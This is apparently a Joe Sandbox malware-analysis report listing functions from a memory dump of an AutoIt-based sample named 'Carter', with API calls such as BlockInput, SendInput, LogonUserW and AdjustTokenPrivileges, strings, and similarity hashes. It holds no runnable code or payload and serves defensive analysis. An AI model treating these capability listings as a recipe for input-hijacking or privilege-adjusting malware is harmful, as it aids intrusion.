Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 35aa14e8dabac54e82eec2a8aa5e4c42d3372483759d6471b2da4ef5cc48266e
Instruction ID: c389ea1885043105929f1e0f839a321027163bf236b8bef6639ee83165d68954
Opcode Fuzzy Hash: 35aa14e8dabac54e82eec2a8aa5e4c42d3372483759d6471b2da4ef5cc48266e
Instruction Fuzzy Hash: 5AF04975A1130CBFDF04DFE4DC89BAEBBBCEF08201F1044A9A901E2180E7346A488B54

Function 00C51AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C51B01
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00C51B14

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: a1911d6aef960eae0be82ae49e2eb31aeeae2f55e7d7e5e650a9c9fffcf4e63d
Instruction ID: 1eb7fec22061ad4b05eb2aa31023f0074dc774547f303c0e3679805b4dcd633e
Opcode Fuzzy Hash: a1911d6aef960eae0be82ae49e2eb31aeeae2f55e7d7e5e650a9c9fffcf4e63d
Instruction Fuzzy Hash: 05F0377590420DABDB00CF95C805BBE7BB4EF04316F10804AFD5596292D3799619DFA8

Function 00C5A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00C69B52,?,00C8098C,?), ref: 00C5A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00C69B52,?,00C8098C,?), ref: 00C5A6EC

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: c66e55904a8f42130616976b2624d0af87d9eb6b9624fdd58eff11f8baa76f81
Instruction ID: 71611c0ddd19aa09e42357dd863b65453ced9978b16283142e85f37d716c43c7
Opcode Fuzzy Hash: c66e55904a8f42130616976b2624d0af87d9eb6b9624fdd58eff11f8baa76f81
Instruction Fuzzy Hash: 6FF0E23510422DBBDB20AFA4CC48FEA776CFF08361F008255B80892180DA309A44CBA5

Function 00C48DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C48F27), ref: 00C48DFE
CloseHandle.KERNEL32(?,?,00C48F27), ref: 00C48E10

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 06ca3b58060c7709ab20c59d1725ce69e5e56a5e341cd7d77c290379846a6bfd
Instruction ID: d47e97e19981068340a7b329f56e68157e1aab23e051469b7665976a7dccc64f
Opcode Fuzzy Hash: 06ca3b58060c7709ab20c59d1725ce69e5e56a5e341cd7d77c290379846a6bfd
Instruction Fuzzy Hash: ACE0E675010610EFE7652F50EC09FB777ADEF05310B24891DF96580470DB619CD4EB50

Function 00C1A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C18F87,?,?,?,00000001), ref: 00C1A38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C1A393

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 461ce4a9601b5eddd150e812af05f122b6d2fb01f30cf7bc7b5a3457478d6a51
Instruction ID: 5527b35fe4406a73cda90328eed4f5952554c254489a51de9cc18ce42854b5d8
Opcode Fuzzy Hash: 461ce4a9601b5eddd150e812af05f122b6d2fb01f30cf7bc7b5a3457478d6a51
Instruction Fuzzy Hash: 7AB09231064708ABCA802B91EC09B8C3F68EB46A62F104010F60D44070CB6264548B99

Function 00C645D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00C645F0

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: f5fbaa5ef9e0dfaf614557b70994796150b74a413b41d1905e6d3a00336ae3c5
Instruction ID: 7db7905ea184f0e176b7ae2ee2d4cf7534bd1da591749cd4eb997fcb25a30bd3
Opcode Fuzzy Hash: f5fbaa5ef9e0dfaf614557b70994796150b74a413b41d1905e6d3a00336ae3c5
Instruction Fuzzy Hash: 21E0DF352002099FC320AF6AE840E9BF7E8AF94760F008026FE0AC7311DF70ED058B90

Function 00C551E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00C55205

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: d1704e819e9a0cf2a7b68ef1a997fbe89e7af8fb761ebc1cab5823e22dbb6586
Instruction ID: 9a7ce8e1d11d1a3dfc059b61575911d19c15226992ec9e2461c65ff4dbd05395
Opcode Fuzzy Hash: d1704e819e9a0cf2a7b68ef1a997fbe89e7af8fb761ebc1cab5823e22dbb6586
Instruction Fuzzy Hash: F2D01CAC160E0A28E8580324DA2FF3F0A08AB007C2F944249B812890C2A8A268CDA43D

Function 00C49369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C48FA7), ref: 00C49389

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 01113a9860f1585bc6ca17e6a6a7e694ba900325c30a35cb46f729946272e5a2
Instruction ID: 72cbeafed6742a7bdb53a9ff101b47e02d373124f57c72b214eac18a1367ec1f
Opcode Fuzzy Hash: 01113a9860f1585bc6ca17e6a6a7e694ba900325c30a35cb46f729946272e5a2
Instruction Fuzzy Hash: 45D05E3326050EABEF018EA4DC01FAE3B69EB04B01F408111FE15D50A0C775D835AB60

Function 00C30722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00C30734

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 7f5debf8cda8af34d6d9749bb972bb47ff6eee6d4b118027a22609699ba39a0c
Instruction ID: 798cb04dbf51542422e17e7d2827bdeb0e8342911203f9e89ec92904a353bfde
Opcode Fuzzy Hash: 7f5debf8cda8af34d6d9749bb972bb47ff6eee6d4b118027a22609699ba39a0c
Instruction Fuzzy Hash: 6BC04CF2810109DBCB05DBA0D998FEF7BBCAB04305F200055A105B2110D7749B448F71

Function 00C1A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C1A35A

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 66163616d8c3c4928d0cc13ce8f6f07ae9601b5c3748006c3f59e22766290af5
Instruction ID: 6acd8712053f13aee00148a8f46f8dfd44a9744307127d45f80bae40816d874b
Opcode Fuzzy Hash: 66163616d8c3c4928d0cc13ce8f6f07ae9601b5c3748006c3f59e22766290af5
Instruction Fuzzy Hash: B3A0113002020CAB8A002B82EC08A88BFACEA022A0B008020F80C000328B32A8208A88

Function 00C73BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00C80980), ref: 00C73C65
IsWindowVisible.USER32(?), ref: 00C73C89

Strings

DELSTRING, xrefs: 00C73D87
TABLEFT, xrefs: 00C73CC5
UNCHECK, xrefs: 00C73EC1
SHOWDROPDOWN, xrefs: 00C73D1E
CHECK, xrefs: 00C73EAB
SENDCOMMANDID, xrefs: 00C74018
GETCURRENTSELECTION, xrefs: 00C73E21
ISVISIBLE, xrefs: 00C73C75
EDITPASTE, xrefs: 00C73F9D
CURRENTTAB, xrefs: 00C73CFB
GETLINECOUNT, xrefs: 00C73F04
SETCURRENTSELECTION, xrefs: 00C73DF4
GETSELECTED, xrefs: 00C73EE1
ISENABLED, xrefs: 00C73CA9
GETCURRENTCOL, xrefs: 00C73F66
FINDSTRING, xrefs: 00C73DB4
TABRIGHT, xrefs: 00C73CDB
ADDSTRING, xrefs: 00C73D54
SELECTSTRING, xrefs: 00C73E44
HIDEDROPDOWN, xrefs: 00C73D3E
GETCURRENTLINE, xrefs: 00C73F2B
GETLINE, xrefs: 00C73FD9
ISCHECKED, xrefs: 00C73E77

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 8b646fc1ee0861983e650df9a604602c658e743bfcb6e84882e20fc84a99d03c
Instruction ID: aca4b1fa6ea25c68889d403bf145be6ba0a18fcf8867fa6b051224dd3ee08f75
Opcode Fuzzy Hash: 8b646fc1ee0861983e650df9a604602c658e743bfcb6e84882e20fc84a99d03c
Instruction Fuzzy Hash: 4ED1A270204215CBCB14EF50C491ABEB7A5FF96344F248558F95A5B2E3CB31EE4AEB41

Function 00C7ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00C7AC55
GetSysColorBrush.USER32(0000000F), ref: 00C7AC86
GetSysColor.USER32(0000000F), ref: 00C7AC92
SetBkColor.GDI32(?,000000FF), ref: 00C7ACAC
SelectObject.GDI32(?,?), ref: 00C7ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 00C7ACE6
GetSysColor.USER32(00000010), ref: 00C7ACEE
CreateSolidBrush.GDI32(00000000), ref: 00C7ACF5
FrameRect.USER32(?,?,00000000), ref: 00C7AD04
DeleteObject.GDI32(00000000), ref: 00C7AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 00C7AD56
FillRect.USER32(?,?,?), ref: 00C7AD88
GetWindowLongW.USER32(?,000000F0), ref: 00C7ADB3

Part of subcall function 00C7AF18: GetSysColor.USER32(00000012), ref: 00C7AF51
Part of subcall function 00C7AF18: SetTextColor.GDI32(?,?), ref: 00C7AF55
Part of subcall function 00C7AF18: GetSysColorBrush.USER32(0000000F), ref: 00C7AF6B
Part of subcall function 00C7AF18: GetSysColor.USER32(0000000F), ref: 00C7AF76
Part of subcall function 00C7AF18: GetSysColor.USER32(00000011), ref: 00C7AF93
Part of subcall function 00C7AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C7AFA1
Part of subcall function 00C7AF18: SelectObject.GDI32(?,00000000), ref: 00C7AFB2
Part of subcall function 00C7AF18: SetBkColor.GDI32(?,00000000), ref: 00C7AFBB
Part of subcall function 00C7AF18: SelectObject.GDI32(?,?), ref: 00C7AFC8
Part of subcall function 00C7AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00C7AFE7
Part of subcall function 00C7AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C7AFFE
Part of subcall function 00C7AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00C7B013

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 392ce5e7cb51bf8498015f38788ca14d95f7404f848c2a59e466251b0ef4ecca
Instruction ID: fd27a7b1b09cf6150f008ad85bfaecf68e97e30cff6004d96eae2b5da7d139db
Opcode Fuzzy Hash: 392ce5e7cb51bf8498015f38788ca14d95f7404f848c2a59e466251b0ef4ecca
Instruction Fuzzy Hash: DDA17A72008301AFD7919F64DC08B6FBBA9FF88321F204A1DF966961A0D771D948CF66

Function 00BF2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00BF3072
DeleteObject.GDI32(00000000), ref: 00BF30B8
DeleteObject.GDI32(00000000), ref: 00BF30C3
DestroyIcon.USER32(00000000,?,?,?), ref: 00BF30CE
DestroyWindow.USER32(00000000,?,?,?), ref: 00BF30D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 00C2C77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C2C7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C2CBDE

Part of subcall function 00BF1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF2412,?,00000000,?,?,?,?,00BF1AA7,00000000,?), ref: 00BF1F76

SendMessageW.USER32(?,00001053), ref: 00C2CC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C2CC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C2CC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C2CC53

Strings

0, xrefs: 00C2CA72

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 46b593216b3c00fe746f070535cf348dbd79bfb60e1171e9479385007a8a468c
Instruction ID: 8772a61729c92f49981281d92c9541359ada06b9e2d6e90cce3452f483f1fcb7
Opcode Fuzzy Hash: 46b593216b3c00fe746f070535cf348dbd79bfb60e1171e9479385007a8a468c
Instruction Fuzzy Hash: CD128D30604225EFDB24DF24D8C4BA9B7E1BF08710F1445AAF955CBA62CB31EE49DB91

Function 00C027FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00C10FE6: std::exception::exception.LIBCMT ref: 00C1101C
Part of subcall function 00C10FE6: __CxxThrowException@8.LIBCMT ref: 00C11031

__wcsnicmp.LIBCMT ref: 00C0286A
__wcsnicmp.LIBCMT ref: 00C0287E
__wcsnicmp.LIBCMT ref: 00C02896
__wcsnicmp.LIBCMT ref: 00C028AE
__wcsnicmp.LIBCMT ref: 00C028C6
__wcsnicmp.LIBCMT ref: 00C028DE
__wcsnicmp.LIBCMT ref: 00C028F6
__wcsnicmp.LIBCMT ref: 00C0290A
__wcsnicmp.LIBCMT ref: 00C02948
__wcsnicmp.LIBCMT ref: 00C0295C
__wcsnicmp.LIBCMT ref: 00C02970
__wcsnicmp.LIBCMT ref: 00C02984

Strings

", xrefs: 00C3FB89
#include-once, xrefs: 00C028C0
#comments-start, xrefs: 00C028F0, 00C02942
#OnAutoItStartRegister, xrefs: 00C028A8
#ce, xrefs: 00C0297E
Cannot parse #include, xrefs: 00C3FCE5
', xrefs: 00C3FB9F
#requireadmin, xrefs: 00C02890
#cs, xrefs: 00C02904, 00C02956
Unterminated group of comments, xrefs: 00C3FCFA
#comments-end, xrefs: 00C0296A
#pragma compile, xrefs: 00C02864
#notrayicon, xrefs: 00C02878
#include, xrefs: 00C028D8
Bad directive syntax error, xrefs: 00C3FBD3, 00C3FBF0

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: dfc72f7d7dd78aed25ecb39088e10650b64150a14b037f69f5dfd49c251ebddf
Instruction ID: 3c5587e77a0b6cd6bbb01194022246f94d975b2f240e443340e5c61c5e903b7c
Opcode Fuzzy Hash: dfc72f7d7dd78aed25ecb39088e10650b64150a14b037f69f5dfd49c251ebddf
Instruction Fuzzy Hash: 23A1DF31A40209BBCB20AF61DC46EBE7BB8AF45B44F144169FC15AB2D2EB709F41E750

Function 00C67B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00C67BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C67C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C67CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C67CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C67D1D
GetClientRect.USER32(00000000,?), ref: 00C67D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C67D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C67D7C
GetStockObject.GDI32(00000011), ref: 00C67D8C
SelectObject.GDI32(00000000,00000000), ref: 00C67D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C67DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C67DA9
DeleteDC.GDI32(00000000), ref: 00C67DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C67DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00C67DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C67E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C67E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00C67E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C67E85
GetStockObject.GDI32(00000011), ref: 00C67E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C67E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C67EA5

Strings

static, xrefs: 00C67D67, 00C67E7F
msctls_progress32, xrefs: 00C67E26
DISPLAY, xrefs: 00C67D72
AutoIt v3, xrefs: 00C67D15

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
